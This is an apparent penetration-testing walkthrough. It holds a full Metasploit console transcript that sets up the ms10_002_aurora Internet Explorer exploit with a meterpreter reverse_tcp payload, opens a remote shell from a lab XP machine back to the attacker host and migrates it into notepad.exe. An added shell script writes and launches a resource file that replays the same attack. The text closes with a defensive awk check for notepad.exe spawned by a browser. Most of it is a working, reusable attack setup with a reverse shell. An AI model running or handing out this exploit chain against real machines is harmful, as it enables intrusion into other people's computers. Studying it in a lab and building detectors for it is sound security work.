root@bt:~# msfconsole
=[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 927 exploits - 499 auxiliary - 151 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops
msf > use windows/browser/ms10_002_aurora
msf exploit(ms10_002_aurora) > show advanced
Module advanced options:
Name : ContextInformationFile
Current Setting:
Description : The information file that contains context information
Name : DisablePayloadHandler
Current Setting: false
Description : Disable the handler code for the selected payload
Name : EnableContextEncoding
Current Setting: false
Description : Use transient context when encoding payloads
Name : ListenerComm
Current Setting:
Description : The specific communication channel to use for this service
Name : VERBOSE
Current Setting: false
Description : Enable detailed status messages
Name : WORKSPACE
Current Setting:
Description : Specify the workspace for this module
msf exploit(ms10_002_aurora) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms10_002_aurora) > show advanced
Module advanced options:
Name : ContextInformationFile
Current Setting:
Description : The information file that contains context information
Name : DisablePayloadHandler
Current Setting: false
Description : Disable the handler code for the selected payload
Name : EnableContextEncoding
Current Setting: false
Description : Use transient context when encoding payloads
Name : ListenerComm
Current Setting:
Description : The specific communication channel to use for this service
Name : VERBOSE
Current Setting: false
Description : Enable detailed status messages
Name : WORKSPACE
Current Setting:
Description : Specify the workspace for this module
Payload advanced options (windows/meterpreter/reverse_tcp):
Name : AutoLoadStdapi
Current Setting: true
Description : Automatically load the Stdapi extension
Name : AutoRunScript
Current Setting:
Description : A script to run automatically on session creation.
Name : AutoSystemInfo
Current Setting: true
Description : Automatically capture system information on initialization.
Name : EnableUnicodeEncoding
Current Setting: true
Description : Automatically encode UTF-8 strings as hexadecimal
Name : InitialAutoRunScript
Current Setting:
Description : An initial script to run on session creation (before
AutoRunScript)
Name : ReverseAllowProxy
Current Setting: false
Description : Allow reverse tcp even with Proxies specified. Connect back will
NOT go through proxy but directly to LHOST
Name : ReverseConnectRetries
Current Setting: 5
Description : The number of connection attempts to try before exiting the
process
Name : ReverseListenerBindAddress
Current Setting:
Description : The specific IP address to bind to on the local system
Name : ReverseListenerComm
Current Setting:
Description : The specific communication channel to use for this listener
Name : VERBOSE
Current Setting: false
Description : Enable detailed status messages
Name : WORKSPACE
Current Setting:
Description : Specify the workspace for this module
msf exploit(ms10_002_aurora) > set AutoRunScript migrate -f
AutoRunScript => migrate -f
msf exploit(ms10_002_aurora) > set SRVPORT 80
SRVPORT => 80
msf exploit(ms10_002_aurora) > set URIPATH /
URIPATH => /
msf exploit(ms10_002_aurora) > set LHOST 192.168.1.11
LHOST => 192.168.1.11
msf exploit(ms10_002_aurora) > set LPORT 443
LPORT => 443
msf exploit(ms10_002_aurora) > exploit -z
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.11:443
msf exploit(ms10_002_aurora) > [*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://192.168.1.11:80/
[*] Server started.
[*] 192.168.1.142 ms10_002_aurora - Sending Internet Explorer "Aurora" Memory Corruption
[*] Sending stage (752128 bytes) to 192.168.1.142
[*] Meterpreter session 1 opened (192.168.1.11:443 -> 192.168.1.142:1051) at 2013-04-28 03:55:55 -0400
msf exploit(ms10_002_aurora) >
[*] Session ID 1 (192.168.1.11:443 -> 192.168.1.142:1051) processing AutoRunScript 'migrate -f'
[*] Current server process: IEXPLORE.EXE (3068)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3452
[+] Successfully migrated to process
msf exploit(ms10_002_aurora) > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 ROOT-9743DD32E3\Administrator @ ROOT-9743DD32E3 192.168.1.11:443 -> 192.168.1.142:1051 (192.168.1.142)
msf exploit(ms10_002_aurora) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > ls
Listing: $U$C:\Documents and Settings\Administrator\-0x433a5c446f63756d656e747320616e642053657474696e67735c41646d696e6973747261746f725cd7c0c3e6
===============================================================================================================================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir 2012-03-23 23:47:29 -0400 .
40777/rwxrwxrwx 0 dir 2013-04-27 11:33:04 -0400 ..
meterpreter >
In the commands above:
msf exploit(ms10_002_aurora) > show advanced
lists the advanced options. Note that the payload's advanced options (AutoRunScript among them) are only shown once a payload has been selected, which is why the second show advanced, run after set payload, is longer than the first.
msf exploit(ms10_002_aurora) > set AutoRunScript migrate -f
sets the script that runs automatically when a session opens; I set it to migrate the session into a freshly spawned process. The `$U$...-0x...` prefix in the later ls listing is Meterpreter's encoding of a non-ASCII path (EnableUnicodeEncoding is true by default, as the advanced options show); the trailing bytes d7c0c3e6 are the GBK encoding of the Desktop directory on this XP install.
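The same setup as a resource script, so the server and handler can be brought up with msfconsole -r instead of retyping the set lines. This is an added example and not code from the original post; the default addresses and ports mirror the transcript, and the privilege check is an assumption about binding ports below 1024 on a Unix-like attacking host such as the Backtrack box above.

```shell
#!/bin/sh
# Added example, not part of the original post: replay the ms10_002_aurora
# setup shown above through an msfconsole resource script.
# Defaults mirror the transcript; override them with positional arguments.
LHOST_DEFAULT="192.168.1.11"
LPORT_DEFAULT="443"
SRVPORT_DEFAULT="80"
URIPATH_DEFAULT="/"

# Print the resource script to stdout, one msfconsole command per line.
# Usage: aurora_rc [lhost] [lport] [srvport] [uripath]
aurora_rc() {
  lhost="${1:-$LHOST_DEFAULT}"
  lport="${2:-$LPORT_DEFAULT}"
  srvport="${3:-$SRVPORT_DEFAULT}"
  uripath="${4:-$URIPATH_DEFAULT}"
  cat <<EOF
use exploit/windows/browser/ms10_002_aurora
set payload windows/meterpreter/reverse_tcp
set AutoRunScript migrate -f
set SRVPORT $srvport
set URIPATH $uripath
set LHOST $lhost
set LPORT $lport
exploit -z
EOF
}

# Ports below 1024 need root on the attacking host (assumption: a Unix-like
# system). Returns 0 when the port/uid pair is workable, 1 otherwise, so the
# failure shows up here rather than as a bind error inside msfconsole.
port_ok_for_uid() {
  port="$1"; uid="$2"
  if [ "$port" -lt 1024 ] && [ "$uid" -ne 0 ]; then
    return 1
  fi
  return 0
}

# Check both listening ports, write aurora.rc and launch msfconsole.
main() {
  uid="$(id -u)"
  for p in "$SRVPORT_DEFAULT" "$LPORT_DEFAULT"; do
    port_ok_for_uid "$p" "$uid" || { echo "port $p needs root" >&2; exit 1; }
  done
  aurora_rc > aurora.rc
  msfconsole -r aurora.rc
}

# Opt in to launching msfconsole; sourcing the file only defines the functions.
if [ "${AURORA_RUN:-0}" = 1 ]; then
  main
fi
```

Run it with AURORA_RUN=1 sh aurora.sh from the attacking host; the browser on the target then only needs to be pointed at http://LHOST:SRVPORT/ as in the walkthrough.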
On the XP machine, browse to http://192.168.1.11/ with IE while watching Task Manager: CPU usage jumps (the heap spray), then shortly afterwards IE closes on its own and CPU usage drops right back. The session survives IE exiting only because migrate -f has already moved it into the notepad.exe that it spawned, as the session output above shows.
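The host-side trace described above (IE spawning a notepad.exe it has no business spawning, the session migrating into it, then IE going away) is also what a defender can look for. As an added example that is not part of the original post, the following shell function scans process-creation records for notepad.exe launched by a browser; the records are constructed here in a simplified Sysmon-style CSV layout, and the paths, PIDs and field order are assumptions.

```shell
#!/bin/sh
# Added example, not from the original post: flag notepad.exe processes whose
# parent is a browser, the pattern 'migrate -f' leaves behind in the session
# output above (IEXPLORE.EXE 3068 spawning notepad.exe 3452).
# Constructed records, simplified Sysmon-style layout (assumption):
#   utc_time,pid,image,ppid,parent_image
SAMPLE_EVENTS='2013-04-28T07:55:50Z,3068,C:\Program Files\Internet Explorer\IEXPLORE.EXE,1580,C:\WINDOWS\explorer.exe
2013-04-28T07:55:56Z,3452,C:\WINDOWS\system32\notepad.exe,3068,C:\Program Files\Internet Explorer\IEXPLORE.EXE
2013-04-28T07:56:10Z,3500,C:\WINDOWS\system32\notepad.exe,1580,C:\WINDOWS\explorer.exe'

# Read records on stdin; print "pid ppid" for every notepad.exe whose parent
# image is a browser. Matching is case-insensitive because Windows paths are,
# and anchored on the final path component so explorer.exe does not match.
flag_browser_spawned_notepad() {
  awk -F, '
    tolower($3) ~ /\\notepad\.exe$/ &&
    tolower($5) ~ /\\(iexplore|firefox|chrome)\.exe$/ { print $2, $4 }
  '
}

# Run the check over the constructed sample.
scan_sample() {
  printf '%s\n' "$SAMPLE_EVENTS" | flag_browser_spawned_notepad
}
```

On the sample this reports 3452 3068, the notepad.exe the session migrated into and its IE parent, while the notepad.exe started from explorer.exe by a user is left alone. Pair the hit with the parent terminating seconds later, as IE does in the walkthrough, to cut false positives further.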